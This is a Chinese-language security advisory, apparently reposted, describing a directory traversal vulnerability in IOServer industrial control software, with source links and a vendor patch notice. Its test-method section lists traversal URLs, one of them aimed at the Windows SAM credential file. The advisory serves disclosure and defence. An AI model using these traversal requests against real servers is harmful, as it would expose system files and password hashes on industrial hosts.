IOServer远程目录遍历漏洞

文章由LinuxBoy分享于2019-04-02 06:04:38热评（529）

发布日期：2012-08-17
更新日期：2012-08-23

受影响系统：
ioserver ioserver 1.x
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 55093

IOServer是运行在Windows上的工业控制软件，包含内置Web服务器以支持XML服务器功能。

IOServer 1.0.19.0之前版本没有正确过滤URL后的输入即用于显示文件，可通过目录遍历序列下载和泄露任意文件内容。成功利用此漏洞需要启用 "XML Server"。

<*来源：hinge

链接：http://secunia.com/advisories/50297/
http://www.foofus.net/?page_id=616
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

hinge （）提供了如下测试方法：

http://www.example.com/modbus.dll

http://www.example.com/

http://www.example.com/.../.../.../windows/repair/sam

http://www.example.com/.../.../.../windows/

建议：
--------------------------------------------------------------------------------
厂商补丁：

ioserver
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.ioserver.com/

推荐文章：